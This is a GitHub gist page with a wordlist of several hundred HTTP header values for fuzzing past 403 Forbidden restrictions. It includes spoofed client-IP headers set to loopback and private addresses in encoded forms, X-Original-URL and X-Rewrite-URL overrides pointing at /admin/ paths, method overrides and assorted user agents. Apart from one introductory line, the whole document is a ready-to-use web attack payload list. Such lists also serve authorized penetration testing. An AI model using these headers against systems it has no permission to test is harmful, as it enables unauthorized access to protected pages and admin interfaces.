Created
October 3, 2024 15:24
-
-
Save Spix0r/85edd0ad5a23f0e011a24654a732ae44 to your computer and use it in GitHub Desktop.
I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, I’ve compiled a list of headers you can fuzz to potentially bypass 403 restrictions.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Allow: CONNECT | |
| Allow: GET | |
| Allow: HEAD | |
| Allow: POST | |
| Allow: TRACE | |
| Client-IP: 0 | |
| Client-IP: 0177.0000.0000.0001 | |
| Client-IP: 0x7F000001 | |
| Client-IP: 10.0.0.0 | |
| Client-IP: 10.0.0.1 | |
| Client-IP: 127.0.0.1 | |
| Client-IP: 127.0.0.1:443 | |
| Client-IP: 127.0.0.1:80 | |
| Client-IP: 127.1 | |
| Client-IP: 172.16.0.0 | |
| Client-IP: 172.16.0.1 | |
| Client-IP: 192.168.1.0 | |
| Client-IP: 192.168.1.1 | |
| Client-IP: 2130706433 | |
| Client-IP: localhost | |
| Client-IP: localhost:443 | |
| Client-IP: localhost:80 | |
| Cluster-Client-IP: 0 | |
| Cluster-Client-IP: 0177.0000.0000.0001 | |
| Cluster-Client-IP: 0x7F000001 | |
| Cluster-Client-IP: 10.0.0.0 | |
| Cluster-Client-IP: 10.0.0.1 | |
| Cluster-Client-IP: 127.0.0.1 | |
| Cluster-Client-IP: 127.0.0.1:443 | |
| Cluster-Client-IP: 127.0.0.1:80 | |
| Cluster-Client-IP: 127.1 | |
| Cluster-Client-IP: 172.16.0.0 | |
| Cluster-Client-IP: 172.16.0.1 | |
| Cluster-Client-IP: 192.168.1.0 | |
| Cluster-Client-IP: 192.168.1.1 | |
| Cluster-Client-IP: 2130706433 | |
| Cluster-Client-IP: localhost | |
| Cluster-Client-IP: localhost:443 | |
| Cluster-Client-IP: localhost:80 | |
| Connection: close | |
| Connection: Close, Accept | |
| Connection: Close, Accept-Application | |
| Connection: Close, Accept-Charset | |
| Connection: Close, Accept-Encoding | |
| Connection: Close, Accept-Encodxng | |
| Connection: Close, Accept-Language | |
| Connection: Close, Accept-Ranges | |
| Connection: Close, Accept-Version | |
| Connection: Close, Accepted | |
| Connection: Close, Access-Control-Allow-Credentials | |
| Connection: Close, Access-Control-Allow-Headers | |
| Connection: Close, Access-Control-Allow-Methods | |
| Connection: Close, Access-Control-Allow-Origin | |
| Connection: Close, Access-Control-Expose-Headers | |
| Connection: X-Bar | |
| Connection: X-Foo | |
| Content-Length: 0 | |
| Content-Length:0 | |
| Forwarded-For: 0 | |
| Forwarded-For: 0177.0000.0000.0001 | |
| Forwarded-For: 0x7F000001 | |
| Forwarded-For: 10.0.0.0 | |
| Forwarded-For: 10.0.0.1 | |
| Forwarded-For: 127.0.0.1 | |
| Forwarded-For: 127.0.0.1:443 | |
| Forwarded-For: 127.0.0.1:80 | |
| Forwarded-For: 127.1 | |
| Forwarded-For: 172.16.0.0 | |
| Forwarded-For: 172.16.0.1 | |
| Forwarded-For: 192.168.1.0 | |
| Forwarded-For: 192.168.1.1 | |
| Forwarded-For: 2130706433 | |
| Forwarded-For: localhost | |
| Forwarded-For: localhost:443 | |
| Forwarded-For: localhost:80 | |
| Host | |
| Host: 0 | |
| Host: 0177.0000.0000.0001 | |
| Host: 0x7F000001 | |
| Host: 10.0.0.0 | |
| Host: 10.0.0.1 | |
| Host: 127.0.0.1 | |
| Host: 127.0.0.1:443 | |
| Host: 127.0.0.1:80 | |
| Host: 127.1 | |
| Host: 172.16.0.0 | |
| Host: 172.16.0.1 | |
| Host: 192.168.1.0 | |
| Host: 192.168.1.1 | |
| Host: 2130706433 | |
| Host: localhost | |
| Host: localhost:443 | |
| Host: localhost:80 | |
| Redirect: 127.0.0.1 | |
| Referer: 0 | |
| Referer: 0177.0000.0000.0001 | |
| Referer: 0x7F000001 | |
| Referer: 10.0.0.0 | |
| Referer: 10.0.0.1 | |
| Referer: 127.0.0.1 | |
| Referer: 127.0.0.1:443 | |
| Referer: 127.0.0.1:80 | |
| Referer: 127.1 | |
| Referer: 172.16.0.0 | |
| Referer: 172.16.0.1 | |
| Referer: 192.168.1.0 | |
| Referer: 192.168.1.1 | |
| Referer: 2130706433 | |
| Referer: http://localhost/ | |
| Referer: localhost | |
| Referer: localhost:443 | |
| Referer: localhost:80 | |
| True-Client-IP: 0 | |
| True-Client-IP: 0177.0000.0000.0001 | |
| True-Client-IP: 0x7F000001 | |
| True-Client-IP: 10.0.0.0 | |
| True-Client-IP: 10.0.0.1 | |
| True-Client-IP: 127.0.0.1 | |
| True-Client-IP: 127.0.0.1:443 | |
| True-Client-IP: 127.0.0.1:80 | |
| True-Client-IP: 127.1 | |
| True-Client-IP: 172.16.0.0 | |
| True-Client-IP: 172.16.0.1 | |
| True-Client-IP: 192.168.1.0 | |
| True-Client-IP: 192.168.1.1 | |
| True-Client-IP: 2130706433 | |
| True-Client-IP: localhost | |
| True-Client-IP: localhost:443 | |
| True-Client-IP: localhost:80 | |
| User-Agent | |
| User-Agent: AppleTV6,2/12.0.1 | |
| User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; AFTS Build/LVY48F) | |
| User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1 | |
| User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36 | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605. | |
| User-Agent: Mozilla/5.0 (PlayStation 4 1.70) AppleWebKit/536.26 (KHTML, like Gecko) | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537. | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10553 | |
| User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.0 Safari/537.36 CrKey/1.5.16041 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15. | |
| User-Agent: Roku4640X/DVP-7.70 (297.70E04154A) | |
| X-Client-IP: 0 | |
| X-Client-IP: 0177.0000.0000.0001 | |
| X-Client-IP: 0x7F000001 | |
| X-Client-IP: 10.0.0.0 | |
| X-Client-IP: 10.0.0.1 | |
| X-Client-IP: 127.0.0.1 | |
| X-Client-IP: 127.0.0.1:443 | |
| X-Client-IP: 127.0.0.1:80 | |
| X-Client-IP: 127.1 | |
| X-Client-IP: 172.16.0.0 | |
| X-Client-IP: 172.16.0.1 | |
| X-Client-IP: 192.168.1.0 | |
| X-Client-IP: 192.168.1.1 | |
| X-Client-IP: 2130706433 | |
| X-Client-IP: localhost | |
| X-Client-IP: localhost:443 | |
| X-Client-IP: localhost:80 | |
| X-Custom-IP-Authorization: 0 | |
| X-Custom-IP-Authorization: 0177.0000.0000.0001 | |
| X-Custom-IP-Authorization: 0x7F000001 | |
| X-Custom-IP-Authorization: 10.0.0.0 | |
| X-Custom-IP-Authorization: 10.0.0.1 | |
| X-Custom-IP-Authorization: 127.0.0.1 | |
| X-Custom-IP-Authorization: 127.0.0.1:443 | |
| X-Custom-IP-Authorization: 127.0.0.1:80 | |
| X-Custom-IP-Authorization: 127.1 | |
| X-Custom-IP-Authorization: 172.16.0.0 | |
| X-Custom-IP-Authorization: 172.16.0.1 | |
| X-Custom-IP-Authorization: 192.168.1.0 | |
| X-Custom-IP-Authorization: 192.168.1.1 | |
| X-Custom-IP-Authorization: 2130706433 | |
| X-Custom-IP-Authorization: localhost | |
| X-Custom-IP-Authorization: localhost:443 | |
| X-Custom-IP-Authorization: localhost:80 | |
| X-Forwarded-By: 127.0.0.1 | |
| X-Forwarded-For: 0 | |
| X-Forwarded-For: 0177.0000.0000.0001 | |
| X-Forwarded-For: 0x7F000001 | |
| X-Forwarded-For: 10.0.0.0 | |
| X-Forwarded-For: 10.0.0.1 | |
| X-Forwarded-For: 127.0.0.1 | |
| X-Forwarded-For: 127.0.0.1:443 | |
| X-Forwarded-For: 127.0.0.1:80 | |
| X-Forwarded-For: 127.1 | |
| X-Forwarded-For: 172.16.0.0 | |
| X-Forwarded-For: 172.16.0.1 | |
| X-Forwarded-For: 192.168.1.0 | |
| X-Forwarded-For: 192.168.1.1 | |
| X-Forwarded-For: 2130706433 | |
| X-Forwarded-For: localhost | |
| X-Forwarded-For: localhost:443 | |
| X-Forwarded-For: localhost:80 | |
| X-Forwarded-Host: 127.0.0.1 | |
| X-Forwarded-Port: 443 | |
| X-Forwarded-Port: 4443 | |
| X-Forwarded-Port: 454 | |
| X-Forwarded-Port: 80 | |
| X-Forwarded-Port: 8080 | |
| X-Forwarded-Port: 8443 | |
| X-Forwarded: 0 | |
| X-Forwarded: 0177.0000.0000.0001 | |
| X-Forwarded: 0x7F000001 | |
| X-Forwarded: 10.0.0.0 | |
| X-Forwarded: 10.0.0.1 | |
| X-Forwarded: 127.0.0.1 | |
| X-Forwarded: 127.0.0.1:443 | |
| X-Forwarded: 127.0.0.1:80 | |
| X-Forwarded: 127.1 | |
| X-Forwarded: 172.16.0.0 | |
| X-Forwarded: 172.16.0.1 | |
| X-Forwarded: 192.168.1.0 | |
| X-Forwarded: 192.168.1.1 | |
| X-Forwarded: 2130706433 | |
| X-Forwarded: localhost | |
| X-Forwarded: localhost:443 | |
| X-Forwarded: localhost:80 | |
| X-Host: 127.0.0.1 | |
| X-HTTP-Method-Override: CONNECT | |
| X-HTTP-Method-Override: HEAD | |
| X-HTTP-Method-Override: PATCH | |
| X-HTTP-Method-Override: POST | |
| X-HTTP-Method-Override: PUT | |
| X-HTTP-Method-Override: TRACE | |
| X-Original-URL: /admin/ | |
| X-Original-URL: /admin/console | |
| X-Original-URL: 0 | |
| X-Original-URL: 0177.0000.0000.0001 | |
| X-Original-URL: 0x7F000001 | |
| X-Original-URL: 10.0.0.0 | |
| X-Original-URL: 10.0.0.1 | |
| X-Original-URL: 127.0.0.1 | |
| X-Original-URL: 127.0.0.1:443 | |
| X-Original-URL: 127.0.0.1:80 | |
| X-Original-URL: 127.1 | |
| X-Original-URL: 172.16.0.0 | |
| X-Original-URL: 172.16.0.1 | |
| X-Original-URL: 192.168.1.0 | |
| X-Original-URL: 192.168.1.1 | |
| X-Original-URL: 2130706433 | |
| X-Original-URL: localhost | |
| X-Original-URL: localhost:443 | |
| X-Original-URL: localhost:80 | |
| X-Originating-IP: 0 | |
| X-Originating-IP: 0177.0000.0000.0001 | |
| X-Originating-IP: 0x7F000001 | |
| X-Originating-IP: 10.0.0.0 | |
| X-Originating-IP: 10.0.0.1 | |
| X-Originating-IP: 127.0.0.1 | |
| X-Originating-IP: 127.0.0.1:443 | |
| X-Originating-IP: 127.0.0.1:80 | |
| X-Originating-IP: 127.1 | |
| X-Originating-IP: 172.16.0.0 | |
| X-Originating-IP: 172.16.0.1 | |
| X-Originating-IP: 192.168.1.0 | |
| X-Originating-IP: 192.168.1.1 | |
| X-Originating-IP: 2130706433 | |
| X-Originating-IP: localhost | |
| X-Originating-IP: localhost:443 | |
| X-Originating-IP: localhost:80 | |
| X-ProxyUser-Ip: 0 | |
| X-ProxyUser-Ip: 0177.0000.0000.0001 | |
| X-ProxyUser-Ip: 0x7F000001 | |
| X-ProxyUser-Ip: 10.0.0.0 | |
| X-ProxyUser-Ip: 10.0.0.1 | |
| X-ProxyUser-Ip: 127.0.0.1 | |
| X-ProxyUser-Ip: 127.0.0.1:443 | |
| X-ProxyUser-Ip: 127.0.0.1:80 | |
| X-ProxyUser-Ip: 127.1 | |
| X-ProxyUser-Ip: 172.16.0.0 | |
| X-ProxyUser-Ip: 172.16.0.1 | |
| X-ProxyUser-Ip: 192.168.1.0 | |
| X-ProxyUser-Ip: 192.168.1.1 | |
| X-ProxyUser-Ip: 2130706433 | |
| X-ProxyUser-Ip: localhost | |
| X-ProxyUser-Ip: localhost:443 | |
| X-ProxyUser-Ip: localhost:80 | |
| X-Real-IP: 0 | |
| X-Real-IP: 0177.0000.0000.0001 | |
| X-Real-IP: 0x7F000001 | |
| X-Real-IP: 10.0.0.0 | |
| X-Real-IP: 10.0.0.1 | |
| X-Real-IP: 127.0.0.1 | |
| X-Real-Ip: 127.0.0.1 | |
| X-Real-IP: 127.0.0.1:443 | |
| X-Real-IP: 127.0.0.1:80 | |
| X-Real-IP: 127.1 | |
| X-Real-IP: 172.16.0.0 | |
| X-Real-IP: 172.16.0.1 | |
| X-Real-IP: 192.168.1.0 | |
| X-Real-IP: 192.168.1.1 | |
| X-Real-IP: 2130706433 | |
| X-Real-IP: localhost | |
| X-Real-IP: localhost:443 | |
| X-Real-IP: localhost:80 | |
| X-Remote-Addr: 0 | |
| X-Remote-Addr: 0177.0000.0000.0001 | |
| X-Remote-Addr: 0x7F000001 | |
| X-Remote-Addr: 10.0.0.0 | |
| X-Remote-Addr: 10.0.0.1 | |
| X-Remote-Addr: 127.0.0.1 | |
| X-Remote-Addr: 127.0.0.1:443 | |
| X-Remote-Addr: 127.0.0.1:80 | |
| X-Remote-Addr: 127.1 | |
| X-Remote-Addr: 172.16.0.0 | |
| X-Remote-Addr: 172.16.0.1 | |
| X-Remote-Addr: 192.168.1.0 | |
| X-Remote-Addr: 192.168.1.1 | |
| X-Remote-Addr: 2130706433 | |
| X-Remote-Addr: localhost | |
| X-Remote-Addr: localhost:443 | |
| X-Remote-Addr: localhost:80 | |
| X-Remote-IP: 0 | |
| X-Remote-IP: 0177.0000.0000.0001 | |
| X-Remote-IP: 0x7F000001 | |
| X-Remote-IP: 10.0.0.0 | |
| X-Remote-IP: 10.0.0.1 | |
| X-Remote-IP: 127.0.0.1 | |
| X-Remote-IP: 127.0.0.1:443 | |
| X-Remote-IP: 127.0.0.1:80 | |
| X-Remote-IP: 127.1 | |
| X-Remote-IP: 172.16.0.0 | |
| X-Remote-IP: 172.16.0.1 | |
| X-Remote-IP: 192.168.1.0 | |
| X-Remote-IP: 192.168.1.1 | |
| X-Remote-IP: 2130706433 | |
| X-Remote-IP: localhost | |
| X-Remote-IP: localhost:443 | |
| X-Remote-IP: localhost:80 | |
| X-Rewrite-URL: /admin/ | |
| X-Rewrite-URL: /admin/console | |
| X-Rewrite-URL: 0 | |
| X-Rewrite-URL: 0177.0000.0000.0001 | |
| X-Rewrite-URL: 0x7F000001 | |
| X-Rewrite-URL: 10.0.0.0 | |
| X-Rewrite-URL: 10.0.0.1 | |
| X-Rewrite-URL: 127.0.0.1 | |
| X-Rewrite-URL: 127.0.0.1:443 | |
| X-Rewrite-URL: 127.0.0.1:80 | |
| X-Rewrite-URL: 127.1 | |
| X-Rewrite-URL: 172.16.0.0 | |
| X-Rewrite-URL: 172.16.0.1 | |
| X-Rewrite-URL: 192.168.1.0 | |
| X-Rewrite-URL: 192.168.1.1 | |
| X-Rewrite-URL: 2130706433 | |
| X-Rewrite-URL: localhost | |
| X-Rewrite-URL: localhost:443 | |
| X-Rewrite-URL: localhost:80 | |
| X-True-IP: 127.0.0.1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment